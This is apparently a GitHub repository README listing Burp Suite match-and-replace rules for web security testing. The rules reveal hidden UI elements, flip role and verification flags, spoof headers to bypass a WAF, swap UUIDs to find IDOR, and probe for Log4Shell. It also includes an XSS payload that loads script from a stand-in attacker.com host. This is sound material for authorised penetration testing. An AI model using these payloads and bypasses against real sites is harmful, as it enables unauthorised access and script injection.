7fc046a71a
Sorry I didn't notice the text vs screenshot mismatch in my last PR (https://github.com/daffainfo/match-replace-burp/pull/2/). It seems the text was always wrong. |
||
---|---|---|
LICENSE | ||
README.md | ||
match-replace-burp.json |
README.md
Match Replace Burp
Useful Match and Replace BurpSuite Rules
Finding hidden buttons, forms, and other UI elements
Many websites contain hidden buttons, forms, and other UI elements like
<div aria-hidden="true"></div>
<div style="visibility: hidden;"></div>
<div style="display: none;"></div>
<script>document.getElementbyTagName("test").hidden=true</script>
<button type="button" disabled>test</button>
- Show Hidden UI (1)
- Show Hidden UI (2)
- Change disable to enable
Changing false
to true
Sometimes we can get hidden features by changing from false
to true
. The example:
- Changing role from normal user to admin
- Make email verified
Bypass WAF
Bypassing WAF by adding some headers
- Adding
X-Forwarded-Host: 127.0.0.1
Create another rule but change the header to:
X-Forwarded-Port: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-Scheme: 127.0.0.1
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Cluster-Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
Origin: null
Origin: Domain.attacker.com
Finding IDOR
By changing original user UUID to another UUID
Create another rule but change the
type
to "Request First Line"
Finding XSS
By adding some XSS payload into the request
- Finding XSS on
User-Agent
- Finding XSS on
Referer
- Auto replace user input with XSS payload
So by just inputting the words
xss_payload
on the website it will be immediately replaced with"><script src=https://attacker.com></script>
Change the XSS payload as you want
MISC
Some random match and replace rules
- Finding CVE-2021-44228
Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere
- Help companies to identify your traffic and separate them from malicious traffic by adding a custom header
References:
- https://twitter.com/PTestical/status/1413497660133318659
- https://twitter.com/HolyBugx/status/1355472991061213184
- https://twitter.com/intigriti/status/1192103070072741894
- https://twitter.com/payloadartist/status/1469582893772984322
- https://twitter.com/payloadartist/status/1422247377516122114
- https://twitter.com/hackerscrolls/status/1247177578269597698
Soon will be updated again